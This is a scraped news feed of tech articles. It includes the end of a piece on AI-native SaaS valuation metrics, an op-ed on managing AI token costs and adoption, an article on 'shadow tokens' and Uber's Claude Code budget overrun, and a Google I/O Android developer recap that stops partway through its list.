<p class="wp-block-paragraph">Along with these new metrics, the industry’s transformation is prompting companies to retire or recalibrate old SaaS measures, including per-seat ARR as a primary key performance indicator (KPI), traditional magic number calibrated to subscription dynamics, unadjusted Rule of 40, customer success metrics tied to human touchpoints, and blended gross margin without AI COGS carve-outs.</p>



<h2 class="wp-block-heading">What does this mean for enterprise value calculations?</h2>



<p class="wp-block-paragraph">As the internal metrics of success change, so do the ways the investment community measures growth and long-term viability.</p>



<p class="wp-block-paragraph">Increasingly, a company’s valuation multiple depends on whether its revenue behaves like committed subscription ARR or volatile usage ARR, and the commit‑to‑burndown ratio is the metric investors use to decide where the company fits.</p>



<p class="wp-block-paragraph">For example, a business with 80% committed credit ARR could trade closer to subscription comps and one with 80% burndown could trade closer to usage comps even though both have the same types of customers. Being able to proactively explain the commit‑to‑burndown mix can help companies avoid undervaluation.</p>



<p class="wp-block-paragraph">In addition, utilization is expected to replace net promoter scores and seat usage as the primary predictor of churn or expansion. Low utilization guarantees downsizing at renewal, so companies must track utilization cohorts the same way SaaS tracks logo retention cohorts today.</p>



<p class="wp-block-paragraph">We’re also seeing an inversion of the operating model, with R&amp;D and COGS moving up the P&amp;L and sales and marketing (S&amp;M) and customer success (CS) moving down or sideways. The net operating leverage profile is structurally different from classical SaaS, and the cost-to-scale curve looks different too.</p>



<p class="wp-block-paragraph">Finally, credit margin engineering is a hidden value-creation lever. The gap between price per credit and cost per credit is set by the software vendor and can be optimized. Most operators have barely started managing this rigorously, and the ones who do will pull away on margin.</p>



<h2 class="wp-block-heading">What this means for leaders, boards and investors</h2>



<p class="wp-block-paragraph">The shift from classic SaaS metrics to new AI‑native measures isn’t cosmetic. It represents the seismic change the industry is experiencing as AI matures and transforms products and organizations.</p>



<p class="wp-block-paragraph">While these metrics — and perhaps others yet to be determined — may evolve over time, there is no doubt they are already changing how AI companies allocate capital, price products, incent sales teams, evaluate performance and communicate with investors.</p>



<p class="wp-block-paragraph">It’s important to remember that SaaS metrics were practical tools for a specific era of software. As that era draws to a close, winning companies will choose new metrics that shape behavior and drive smart decision-making.</p>



<p class="wp-block-paragraph"><em>The views reflected in this article are the views of the author and do not necessarily reflect the views of Ernst &amp; Young LLP or other members of the global EY organization.</em></p>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Why I changed how I pitch AI: It’s no longer about saving money, but managing tokens and adoption]]></title>
<description><![CDATA[I have worked alongside enterprise technology for more than 30 years and watched AI evolve from a lab experiment into the modern boardroom’s core focus. However, the last few years of implementing AI alongside our customers have delivered our most profound reality checks.



The initial hype has ...]]></description>
<link>https://tsecurity.de/de/3694390/it-security-nachrichten/why-i-changed-how-i-pitch-ai-its-no-longer-about-saving-money-but-managing-tokens-and-adoption/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694390/it-security-nachrichten/why-i-changed-how-i-pitch-ai-its-no-longer-about-saving-money-but-managing-tokens-and-adoption/</guid>
<pubDate>Sat, 25 Jul 2026 18:55:49 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">I have worked alongside enterprise technology for more than 30 years and watched AI evolve from a lab experiment into the modern boardroom’s core focus. However, the last few years of implementing AI alongside our customers have delivered our most profound reality checks.</p>



<p class="wp-block-paragraph">The initial hype has faded, leaving CIOs to drive real enterprise value. Based on my experience implementing Google, OpenAI and Anthropic technologies, here are the fundamental, technology-agnostic lessons every leader must anchor their strategy around.</p>



<h2 class="wp-block-heading"><a></a>AI as a leadership multiplier</h2>



<p class="wp-block-paragraph">The most common tactical error we see is treating AI as an isolated technology project. What I have observed among our customers is that true success does not come from organizations that define a standalone “AI strategy,” but rather from those leaders that integrate AI into their business strategy.</p>



<p class="wp-block-paragraph">When our customers isolate AI and define an AI strategy, it inevitably treats it like a “technological toy” to experiment with. This approach yields fragmented, orphaned initiatives that fail to scale because they are fundamentally disconnected from their core corporate objectives. What I learned is that AI is not the ultimate destination; it is a powerful catalyst. We have replaced “What can AI do for our customers?” with a more strategic question, “How does AI accelerate their existing business goals?”</p>



<p class="wp-block-paragraph">Think of AI like electricity. No modern corporation designs a standalone “electricity strategy.” Instead, all companies route it invisibly across the entire organization to illuminate offices, power production lines and drive communication. AI must be woven into the enterprise fabric in the exact same way, acting as an underlying utility that supercharges your existing operational model.</p>



<p class="wp-block-paragraph">Integrating AI into the broader business strategy also dictates how we measure success. It forces a shift away from short-term tech vanity metrics and anchors the technology into a long-term roadmap.</p>



<p class="wp-block-paragraph">When AI remains trapped within the IT department of our customers, we notice that it is relegated to a mere “software experiment.” To become a true competitive advantage, we observed that AI requires intense cross-functional orchestration. This perspective does not diminish the merit of the technical team; their expertise is fundamental for establishing the architecture, data governance and tools your enterprise requires. However, while IT builds the foundational infrastructure, it lacks the organizational authority to decide what should be built on top of it. Only the CEO or the owner of the company can step in to ensure AI leaves the “toy project” phase and integrates into the DNA of the organization.</p>



<p class="wp-block-paragraph">The requirement for top-down, executive ownership stems from three critical realities observed in the field:</p>



<ul class="wp-block-list">
<li><strong>Silo-smashing and data collaboration:</strong> True enterprise AI is data-hungry and that data lives across disparate business lines, finance, operations, marketing and customer service. Only the CEO possesses the cross-functional authority to demand that data silos be dismantled.</li>



<li><strong>Cultural transformation and fear mitigation:</strong> AI triggers widespread anxiety over job displacement across all industries and hierarchies. When relegated to an “IT project,” resistance spikes as teams view it as a threat to their livelihoods. When I saw the CEO lead this cultural shift directly is when I noticed the best results.</li>



<li><strong>C-Suite education and strategic alignment:</strong> The mandate for AI capability cannot just be delegated downward; the transformation must begin at the very top. I have conducted more than 70 presentations for the Board of Directors and C-Level teams. These people need to be actively educated not on technical code, but on specific business use cases, return on investment (ROI) frameworks and how AI resolves core organizational bottlenecks.</li>
</ul>



<p class="wp-block-paragraph"><a href="https://www.pwc.com/gx/en/issues/c-suite-insights/ceo-survey.html">PwC’s data found that only 12% of enterprises have achieved both cost and revenue benefits from AI</a>. Those elite 12% succeeded precisely because their CEOs embedded AI extensively across <em>strategic decision-making and cross-functional workflows</em>. AI is simply too disruptive and too critical to be left exclusively in the hands of technical experts. If AI is not on the CEO’s weekly agenda, it is fundamentally missing from the company’s true strategy.</p>



<h2 class="wp-block-heading"><a></a>AI as a new operational framework</h2>



<p class="wp-block-paragraph">Traditional IT systems have operated on strict algorithmic certainty: if you input a specific set of data, the system executes an immutable line of code and guarantees the same, predictable output every single time.</p>



<p class="wp-block-paragraph">AI completely breaks this paradigm. Because modern AI is built on probabilistic models, it does not execute static formulas; instead, it predicts the most likely correct response based on mathematical probabilities. This means that AI solutions carry an inherent, small percentage of uncertainty and variability. A prompt entered today might yield a slightly different, though contextually valid, output tomorrow.</p>



<p class="wp-block-paragraph">Executive leadership and organizational cultures must be actively educated to accept and navigate this fundamental shift. Traditional quality assurance frameworks for software are designed for a 100% success rate. Applying this rigid standard to AI will paralyze your initiatives, keeping 80% of your projects trapped eternally in the pilot phase. This happened to us in a food and beverage company in Latin America a couple of years ago. After this experience, we started to include conditions in our contracts that tolerate statistical margins of error and still define the project as a success.</p>



<p class="wp-block-paragraph">In terms of cost calculation, we had to teach CIOs and business managers to forget the monthly subscription model for AI and learn to manage the primary unit of exchange in modern AI: the token.</p>



<p class="wp-block-paragraph">To understand AI costs, executives must understand how large language models process data. AI models do not read full words; instead, they break text, images or code down into “pieces” called tokens. As a baseline, every 100 words process as approximately 130 to 140 tokens. Because the major AI providers use the token as their currency, <a href="https://arxiv.org/pdf/2604.22750">your business is billed dynamically based on the exact volume of tokens consumed</a> by every query submitted (input) and every response generated (output).</p>



<p class="wp-block-paragraph">Many leaders believe AI costs are fixed due to flat-rate enterprise tiers ($25–$30/user). This is a temporary illusion. These venture-capital-subsidized rates mask true operational costs and come with dynamic usage limits. Modeling long-term ROI on them guarantees a severe budget shock when true consumption pricing takes over.</p>



<p class="wp-block-paragraph">The solution is not to halt AI adoption; doing so means losing your competitive edge. Instead, the cost per token must cease to be treated as a technical footnote relegated to the IT department. It must be elevated to a core business variable.</p>



<h2 class="wp-block-heading">Risks in the AI adoption model</h2>



<p class="wp-block-paragraph">Since the beginning of the AI boom, I have seen all our customers making a critical tactical error that could cost them heavily in the medium term: they are focusing only on operational efficiency (reducing costs with AI).</p>



<p class="wp-block-paragraph">I have observed that an alarmingly high percentage of companies remain trapped in pilot phases focused exclusively on short-term cost reduction. <a href="https://www.bain.com/insights/your-ai-budget-is-growing-your-returns-arent-heres-why/">Bain &amp; Company’s global Automation and AI Pathfinder Survey </a>found that the largest share of companies measuring their AI initiatives (exactly 40%) realized cost reductions of 10% or less, heavily missing their internal targets. Our customers are putting too many resources and effort into marginal financial gains and in doing so, they are jeopardizing their most valuable assets: service quality, resilience and customer trust.</p>



<p class="wp-block-paragraph">Utilizing AI solely to slash headcount or cut operational corners is a dangerous trap that introduces severe field liabilities. A financial service organization in Latin America announced that they saved $1 million in customer support by replacing humans with AI chatbots. However, the mid-term reality revealed a different story: a damaged brand reputation due to AI errors and an influx of frustrated clients fleeing because the automated system cannot handle special cases.</p>



<p class="wp-block-paragraph">Putting a company on an extreme AI diet might make it look leaner on next quarter’s financial statement, but over-indexing on cost-cutting will ultimately leave the business too weak to compete when market dynamics shift. We are now inviting our customers to change the question from <em>“How much money will AI save us?”</em> to <em>“How will we leverage AI to exponentially increase the long-term value of our enterprise?”</em></p>



<p class="wp-block-paragraph">Deploying enterprise AI is a marathon, not a sprint, and the terrain changes with every mile. The organizations that thrive in this next era will be those that transition from fascination to discipline, treating AI not as a magic bullet for immediate savings, but as a core capability that demands rigorous governance, architectural foresight and cultural maturity. Navigating this shift requires moving past the theoretical hype and anchoring decisions in raw, field-tested reality.</p>



<p class="wp-block-paragraph">As we continue to deploy these technologies across industries, the blueprint for success is being rewritten in real time. Let’s keep this conversation going as we map out the future of business intelligence together.</p>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Getting a grip on shadow tokens and AI blowouts]]></title>
<description><![CDATA[Four months of Claude Code — that’s all it took for Uber to burn through its entire annual budget for AI. Token after token, engineers embraced the platform with few control mechanisms tying costs to outcomes. The result was a budget runaway and a clear case study in how limited oversight snowbal...]]></description>
<link>https://tsecurity.de/de/3694389/it-security-nachrichten/getting-a-grip-on-shadow-tokens-and-ai-blowouts/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694389/it-security-nachrichten/getting-a-grip-on-shadow-tokens-and-ai-blowouts/</guid>
<pubDate>Sat, 25 Jul 2026 18:55:48 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Four months of Claude Code — that’s all it took for Uber to burn through its entire annual budget for AI. Token after token, engineers embraced the platform with few control mechanisms tying costs to outcomes. The result was a budget runaway and <a href="https://www.forbes.com/sites/janakirammsv/2026/05/17/uber-burns-its-2026-ai-budget-in-four-months-on-claude-code/">a clear case study</a> in how limited oversight snowballs into an AI blowout.</p>



<p class="wp-block-paragraph">This is a phenomenon I like to call “shadow tokens” — AI credits paid for by the company but largely invisible to decision-makers. Too many engineers have the final say over how much they consume and, therefore, what it costs. This all-you-can-eat attitude is part of the reason why <a href="https://www.theverge.com/tech/930447/microsoft-claude-code-discontinued-notepad">Microsoft is reportedly</a> winding down many internal licenses across key engineering teams and why <a href="https://www.thestreet.com/investing/the-next-phase-of-ai-spending-is-already-underway">one in five organizations</a> is missing its AI spend forecast by more than 50%.</p>



<p class="wp-block-paragraph">And the trend is only accelerating. By 2028, <a href="https://www.cio.com/article/4189149/ai-coding-token-costs-are-on-track-to-rival-human-payroll.html">Gartner predicts</a> that AI coding costs (driven by this kind of ungoverned consumption) will be as much per developer as the salary companies pay that person.</p>



<p class="wp-block-paragraph">LLMs and agents introduce a new class of variable cost that scales with behavior rather than headcount, putting enterprises on the hook for tools that balloon with workload. I don’t see this as enterprises overspending because they’re reckless — it’s down to a lack of managerial oversight, budget alignment that demands a proven return on investment, and engineer education on how much is too much.</p>



<p class="wp-block-paragraph">Going forward, CIOs need to thread the AI needle between governance that encourages transparency and reasonable spend without stifling innovation.</p>



<h2 class="wp-block-heading">When shadow tokens result in real costs</h2>



<p class="wp-block-paragraph">The issue is that AI isn’t a traditional line item. Previously, enterprise leaders onboarded software-as-a-service (SaaS) with a good idea of the total cost. An allocated software seat or annual contract was a known quantity. The cloud added some variation (with fluctuations depending on hosting size), but instances were still modelable. AI flips this status quo on its head — the unit of consumption is behavior and the cost is exponential.</p>



<p class="wp-block-paragraph">And these specifics aren’t immediately apparent at pilot. Tools can appear inexpensive in controlled experiments yet unpredictably scale depending on session length, context window size, model selection and whether agents run in parallel. This is the fallacy of the $20-per-seat enterprise plan — tokens are charged separately at API rates with no ceiling. The final dollar value of any session is set by factors that finance can’t always model in advance, particularly when these decisions usually rest with the engineers themselves.</p>



<p class="wp-block-paragraph">According to <a href="https://www.deloitte.com/cz-sk/en/services/consulting/research/the-state-of-ai-in-the-enterprise.html">Deloitte</a>, only 21% of organizations deploying agents have a mature governance model, a real concern because they’re token-eating machines. This is what was happening at Uber — Claude Code in agentic mode was autonomously reading codebases, planning changes across dozens of files and opening pull requests. Each step quickly adds up, with Anthropic’s own documentation noting that agents consume approximately seven times as many tokens as standard sessions.</p>



<p class="wp-block-paragraph">This is shadow IT and shadow AI, evolved. This time, however, many leaders approved the tool in question without guardrails governing consumption. AI hype adds fuel to the fire and normalizes long sessions. Uber’s CTO, for example, <a href="https://x.com/praveenTweets/status/2033627282418655711">described</a> a company-wide shift toward “agentic software engineering” with employees “who are quietly experimenting, quietly shipping and quietly pushing things forward”. This is an exciting way to test the limits of what’s possible, certainly, but it’s also a position that goes a long way to explaining how the company spent its annual AI budget by April.</p>



<h2 class="wp-block-heading">Shifting the culture from usage to yield</h2>



<p class="wp-block-paragraph">Engineers haven’t done anything wrong here. In fact, they’re adopting and experimenting as instructed, with Uber creating leaderboards and ranking users by token consumption. More use led to a better ranking, reflecting a culture that lauds new ways of doing things. This behavior is known as “<a href="https://www.cio.com/article/4178320/tokenmaxxing-when-ai-adoption-metrics-go-bad.html">tokenmaxxing</a>,” and its principal knock-on effect is shadow tokens — quantity-over-quality processes that leaders struggle to control until they’re fully realized in the budget. Of course, if management treats adoption metrics as performance metrics, then engineers can’t be blamed for using more tokens. The tension is that the teams driving adoption aren’t the ones managing spend.</p>



<p class="wp-block-paragraph">None of this is meant to dismiss AI’s productivity possibilities and potential return on investment. Developers save <a href="https://getdx.com/blog/ai-assisted-engineering-q4-impact-report-2025/">3.6 hours</a> per week, achieve 60% higher pull request throughput and cut onboarding time in half with automation. Meanwhile, Uber shared that roughly 11% of live backend updates were written by agents with no human in the loop. However, these wins aren’t the problem — it’s that too many teams aren’t connecting input to output. I’ve spoken to admins who discovered their token spend had tripled in a single quarter after using heavier models or accidentally doubling up on agentic applications. Nobody knew until the financial damage was done.</p>



<p class="wp-block-paragraph">Automation needs to happen sustainably with an eye on the bottom line. In my view, a much better metric for achieving this is AI yield — the measurable business or engineering output generated per dollar spent on tokens. Otherwise, without a feedback loop, even genuinely productive teams are flying blind.</p>



<h2 class="wp-block-heading">Stopping token waste before an AI blowout</h2>



<p class="wp-block-paragraph">Creating that throughline between AI investment and token consumption starts with established financial metrics. This is possible via maximum spend limits (dictated by spend tagging, workload tiering and cost-per-output benchmarks) per team or project. Then, any additional allocation requires approval, closing the loop between the engineers spending the tokens and the leaders paying for them. AI isn’t cheap and teams should demonstrate a bang for their buck.</p>



<p class="wp-block-paragraph">This is something we do with our engineering team at Hexnode. Resource allocation for Claude Code and Cursor is tied directly to ROI rather than letting consumption run open-ended. Given the pay-as-you-go nature of these tools, a firm usage limit per team offers simple but essential control.</p>



<p class="wp-block-paragraph">Similarly, there’s room to apply some of the governance principles IT uses for device management. Things like policy enforcement, role-based access, real-time monitoring and automated alerts can flag usage behavior in advance. Uncovering such insights at the token layer works to identify power users and prevent excessive spending.</p>



<p class="wp-block-paragraph">We also need to encourage cultures that praise outputs that actually achieve efficiency. AI applications that result in shipping faster, reducing rework and cutting review cycles are gains that should be celebrated. If your company hosts leaderboards, frame unnecessary token burn as wasteful rather than valuable. The organizations creating healthier consumption habits work with their engineers to understand not just how to use AI, but what responsible use looks like and what it costs.</p>



<p class="wp-block-paragraph">This is a conversation teams need to have now. Anthropic <a href="https://support.claude.com/en/articles/15036540-use-the-claude-agent-sdk-with-your-claude-plan">just ended flat-rate pricing</a> for programmatic workloads from June 15. Now, agents, continuous integration pipelines and automated workflows draw from a dedicated monthly credit pool billed separately from the subscription. Once that pool is exhausted, agent tasks either stop entirely or overflow to extra billing. Work can either get very expensive or grind to a halt for teams that aren’t prepared.</p>



<p class="wp-block-paragraph">Getting a grip on shadow tokens means better rules and tools connecting spend to outcomes. Only by building the financial and cultural infrastructure that encourages sustainable adoption can leaders see what they’re spending, connect it to what they’re getting and course-correct before the costs become a crisis. Ultimately, shadow tokens are only invisible if we choose not to look.</p>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[17 Things to know for Android developers at Google I/O]]></title>
<description><![CDATA[Posted by Matthew McCullough, VP, Product Management, Android DeveloperToday at Google I/O, we announced the many ways we’re powering agentic workflows to increase your productivity and ensure your apps shine across the expanding Android ecosystem. Here’s a recap of 17 of our favorite announcemen...]]></description>
<link>https://tsecurity.de/de/3693511/android-tipps/17-things-to-know-for-android-developers-at-google-io/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693511/android-tipps/17-things-to-know-for-android-developers-at-google-io/</guid>
<pubDate>Sat, 25 Jul 2026 10:15:45 +0200</pubDate>
<category>🤖 Android Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[
<img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjP7OJeCTRC-RN9j39-rULmU26qB-lZoyIZjjDrq07Z7b5GsfHz3q18ftSgcWReGBgIBkp03B6BVghzWllOC38o4jckzzq-e4a8R23ISeegev98zubhGXbIzhTZaqbCTaPLJC2zkxKYvvNspcM4yXkk94f6PEQHpdyMvlpwogicTWQRn3GEksJHOTQDIG4/s2048/GoogleForDevelopers-AndroidText-StrapiMetacard-2048x1323.png">


<div><div class="separator"><div class="separator"><div class="separator"><i>Posted by Matthew McCullough, VP, Product Management, Android Developer</i></div></div></div></div><div><div class="separator"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVq21_VInGStxa8CNxcwiU_tpvlkPXci8aDeSb8qUqBe4teuWUN_vIqBf_W64xjTQMBYFyJkdXB-nshsp9DXXEwzUV8-Zn9feQTbuyLk8l98kAlFQqz3_LZrYaEvCukqXCZuY95tmNzrLFqXSviaTTSxflyAkpXJb88cB7mZ7g0x6fdnKzXqY8i1jmhqM/s4209/GoogleForDevelopers-AndroidText-Blogger-4209x1253.png"><img border="0" data-original-height="1253" data-original-width="4209" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVq21_VInGStxa8CNxcwiU_tpvlkPXci8aDeSb8qUqBe4teuWUN_vIqBf_W64xjTQMBYFyJkdXB-nshsp9DXXEwzUV8-Zn9feQTbuyLk8l98kAlFQqz3_LZrYaEvCukqXCZuY95tmNzrLFqXSviaTTSxflyAkpXJb88cB7mZ7g0x6fdnKzXqY8i1jmhqM/s16000/GoogleForDevelopers-AndroidText-Blogger-4209x1253.png"></a></div><div><br></div>Today at <a href="https://io.google/2026/">Google I/O,</a> we announced the many ways we’re powering agentic workflows to increase your productivity and ensure your apps shine across the expanding Android ecosystem. Here’s a recap of 17 of our favorite announcements for Android developers; you can also <a href="https://www.youtube.com/live/KvTRMSa1w4E?si=QBAxNvihPwJCJUuS">see what was announced last week</a> in <a href="https://developer.android.com/events/show">The Android Show: I/O Edition</a>. Stay tuned over the next two days as we dive into all of the topics in more detail!<h2><strong><span>Build High Quality Android Apps Using Agents</span></strong></h2>

  <h3><strong><span>1: Android CLI: helping you build with any agent, LLM, and tool</span></strong></h3>
  <a href="https://goo.gle/CLI_IO26">Android CLI is now stable</a>. It offers programmatic tools that allow any AI agent, including Claude Code, Codex, or Antigravity, to perform core Android tasks much more easily and efficiently. With today’s release, it also provides a bridge to tap directly into the "heavy-lifting" power of Android Studio to give you the production-ready polish needed for professional Android development. By leveraging the new android studio commands, developers can now grant their preferred agents the ability to perform semantic symbol resolution, analyze files for warnings, and even render Jetpack Compose previews. This release also enables official support for "Journeys" through new <a href="https://developer.android.com/tools/agents/android-skills">Android skills</a>, which enables agents to execute end-to-end UI tests under your direction. Watch the <a href="https://www.youtube.com/watch?v=aqmpZocmR8o&amp;list=PLOU2XLYxmsIKL_eEgkKJWDRhYUEvS9eYz&amp;index=23">developer keynote</a>, and tune into the <a href="https://io.google/2026/explore/pa-keynote-7">What’s New in Android tools talk</a> for more information.    <p><span></span></p><div class="separator"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXrW3yDK9uH_I8MDyVxgYbPAXfrNTJvlMkXhaZFrM1X9ob0LvQbGe_ZC6anUeO_VNd181iptI_MIuEEpX-9GZdf6ZTJCN-WHpPzDCLOeSblo8vrjliSZ0rRrHwIsERWBjbbosP-M_WvA2pva9mF5FWVygAwQbdiW3SLZgJj9TpRIruG4H-ILsvSq_b4dc/w640-h442/agy-android-cli%20(2).png"></div><div class="separator"><span><i>You can now easily install Android CLI for use with Google Antigravity 2.0.</i></span></div><p></p>

  <h3><strong><span>2: Build production-ready apps with ease in Google AI Studio</span></strong></h3>
  Developers and creators can now <a href="http://android-developers.googleblog.com/2026/05/build-android-apps-google-ai-studio.html">build native Android apps, simply with a prompt in Google AI Studio</a>. The apps are built with development best practices like Jetpack Compose, Kotlin, and APIs that leverage our recommended developer patterns. Google AI Studio enables developers to prototype, iterate via an embedded emulator, and deploy to physical devices without heavy local installations. Developers are then able to take those apps and share them to Android devices, as well as share them with others for testing through Google Play Console’s internal testing track. If a developer wants to prepare their app for a wider release, they’re able to take it to Android Studio for advanced debugging, testing, and UI polish. Watch the <a href="https://www.youtube.com/watch?v=aqmpZocmR8o&amp;list=PLOU2XLYxmsIKL_eEgkKJWDRhYUEvS9eYz&amp;index=23">developer keynote</a>, and tune into the <a href="https://io.google/2026/explore/pa-keynote-7">What’s New in Android tools talk</a> for more information.<br><br><div><div class="separator"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdRaw1v6rolr4alo0C6AWKdFchsMEQgtOGfmk2Ramb0IoOB7smDcVU3yC7YJMkvVQuCPJ9vQW53tQjaV-5wcgOGzMtFDmb_Jbv40an1kvQdqYburXnsONvLqckKL2MWuShi3XmQEstW761oOLjujOk3FMsh3FyAiy5-Pe7xdTwFdfkWOmEnHhQfUJhtCo/w640-h544/image1.gif"></div><i><div class="separator"><i>Use the embedded Android Emulator to create Android apps in Google AI Studio</i></div></i></div><h2><strong><span>3: Accelerating AI coding assistance with Android Bench</span></strong></h2>
  <a href="http://d.android.com/bench">Android Bench</a> is our LLM leaderboard for Android development challenges. The goal is to accelerate model improvements, so you have more useful options for AI assistance. Many of you have been using open-weight models for AI assistance, so we’re now adding commonly used ones, such as Gemma 4, to the leaderboard, so you can see how LLMs that offer offline access and additional flexibility for power-users measure up. We're continuously working on increasing the difficulty of challenges we’re giving LLMs, to continue encouraging more useful improvements. <h3><strong><span>4: Convert iOS apps to Android with the Migration Assistant in Android Studio</span></strong></h3>
  The Migration Assistant in Android Studio is designed to port apps from platforms like iOS, React Native, or web frameworks to native Android. By simply selecting an existing project, developers can have the agent intelligently map features, convert assets like storyboards and SVGs, and implement Android best practices using Jetpack Compose and our recommended Jetpack libraries. This effectively transforms what used to be weeks of manual porting into a streamlined agentic workflow that only takes hours. We shared a preview of the incoming feature in the <a href="https://www.youtube.com/watch?v=aqmpZocmR8o&amp;list=PLOU2XLYxmsIKL_eEgkKJWDRhYUEvS9eYz&amp;index=23">developer keynote</a>. </div><div><div class="separator"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjK7UKI_nzS7gOkDXYONAjCNbQ4eSqlgT8qqMT5D4qf0OjQUNtxj4Urpq-eTROMEDgrqLKGlwMm_lHA7ayG_BC1DkitQI1ZKsF5gYr-mPIxFUsz_8JPcVHFAtnHZoO2CrVjMEvJrqvBz8_WU1I0T1P2diDprR2B47PcA21oS3RLtbgrhmrpiWV-MAw9ks4/w640-h360/image9%20(1).gif"></div><div class="separator"><i>A sneak peek of the Migration Assistant converting an iOS app into a native Android app</i></div>

  <h2><strong><span>Building AI Into Your Apps</span></strong></h2>

  <h3><strong><span>5: Building Intelligent Apps with generative AI</span></strong></h3>
  Generative AI enables you to create apps that are more intelligent, personalized, and agentic than ever before. This year, we introduced the latest advancements in on-device intelligence with a preview of Gemini Nano 4 for tasks like data extraction and summarization. We also expanded cloud capabilities via Firebase AI Logic, allowing developers to leverage Gemini models with robust grounding (including URL, Maps, and web search) to build smarter, more capable assistants. Furthermore, we unveiled our hybrid inference approach and the new <a href="https://goo.gle/ADK_IO26">Agent Development Kit (ADK) for Android</a>, alongside communication protocols like AG-UI and A2UI that simplify the creation of autonomous, agentic experiences. To start integrating these powerful features, explore the <a href="https://developer.android.com/ai">developer documentation</a>, and watch the technical deep dive session where we showcase all these technologies.

  <h3><strong><span>6: Experiment with AppFunctions today</span></strong></h3>
  AppFunctions is an <a href="https://developer.android.com/reference/android/app/appfunctions/package-summary">Android platform API</a> with an accompanying <a href="https://developer.android.com/jetpack/androidx/releases/appfunctions">Jetpack library</a> to simplify building Android MCP integrations. It empowers your apps to behave like on device MCP servers, contributing functions that act as tools for use by agents and assistants. AppFunctions integration with Gemini is currently in a private preview with trusted testers, and you can begin preparing your apps already. You can sign up for the <a href="http://goo.gle/eap-af">Early Access Program</a> and start experimenting using the <a href="http://d.android.com/ai/appfunctions">API guidance</a>, <a href="https://github.com/android/appfunctions">sample</a>, and <a href="https://github.com/android/skills/blob/main/device-ai/appfunctions/SKILL.md">skill</a> today.

  <h2><strong><span>The Future is Adaptive</span></strong></h2>

  <h3><strong><span>7: Android is now Compose First; Views are now in maintenance mode.</span></strong></h3>
  Compose is our standard for UI development, and we are moving to a Compose-first approach for all future guidance and libraries. Building on five years of evolution, the latest releases deliver a more mature toolkit, from the highly customizable Styles API to refined shared element transitions and enhanced input support. These updates allow you to build beautiful, adaptive apps with less code and better performance. Learn more about what Compose-first means for Android Development in <a href="http://android-developers.googleblog.com/2026/05/android-ui-development-is-compose-first.html">our blog post</a>. <br><br></div><div class="separator"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgq9kh5gxOfSdY2w9ZeKdWropXpqP7rj4KtodIZA5B_j7ujQu-blrsQKKC0lI4VEsEycpLEwsZeJhHaNOY1Xe9DrIHDwVszYfQN0GQlwxz8xoVfg1oiIr9zNlUyqqdCl2M7pyHoHgVvC7omKRthmXNaO3GE5Q15XeZ1ALiugszd8qHxpWuHo2Eh79zYW4M/w640-h416/image5.png"></div><div><div><i>Build Android UI with Compose</i></div><h3><strong><span>8: Building seamless Android experiences across devices with Jetpack Compose</span></strong></h3><div>The Android ecosystem is now <a href="https://goo.gle/AdaptiveApps_IO26">Adaptive by Default</a>, moving fluidly across phones, foldables, tablets, cars, XR, and expanding usages with <a href="https://developer.android.com/googlebook">Googlebook</a> and connected displays. With over 580 million large-screen devices, and users on multiple devices spending up to 14x more on apps, the investment in adaptive design presents a massive opportunity. <a href="https://developer.android.com/compose">Jetpack Compose</a> is the definitive engine for this transition, offering core tools like our latest <a href="http://goo.gle/nav3">Jetpack Navigation 3</a> release, new experimental <a href="https://developer.android.com/develop/ui/compose/layouts/adaptive/grid">Grid</a> and <a href="https://developer.android.com/develop/ui/compose/layouts/adaptive/flexbox">FlexBox</a> layouts, enhanced non-touch input support, and <a href="https://developer.android.com/media/camera/camerax">CameraX</a> for correct camera previews across any window size. Furthermore, new <a href="https://developer.android.com/tools/agents/android-skills">skills</a> in Android Studio make updating your existing app to adopt these adaptive patterns easier than ever.

  <img src="https://blogger.googleusercontent.com/img/a/AVvXsEi3DD3G6IUrmOwYh7bMq0uieBvGL8li2W48YnUfQfa3ZXy2kD7QvPorNfAyCSmFlBs4q0csXDqmZjhyGf8UHFE2pUNjvqxLaaJhmm6QpSBumq2YkMHI1jyiTNfh5WQhEEY9hP6vWhcbbwflygdTwYzoIdnuIqoht0S6iGKk4pVCnxL2wVXYBMBlcdeneD8"><i>Notability’s Android debut sets a new standard for premium productivity apps. Built with Jetpack Compose, Navigation 3, and Kotlin Multiplatform, it delivers an intuitive, adaptive experience across devices.</i></div><h3><strong><span>9: Create seamless experiences for Googlebook</span></strong></h3>
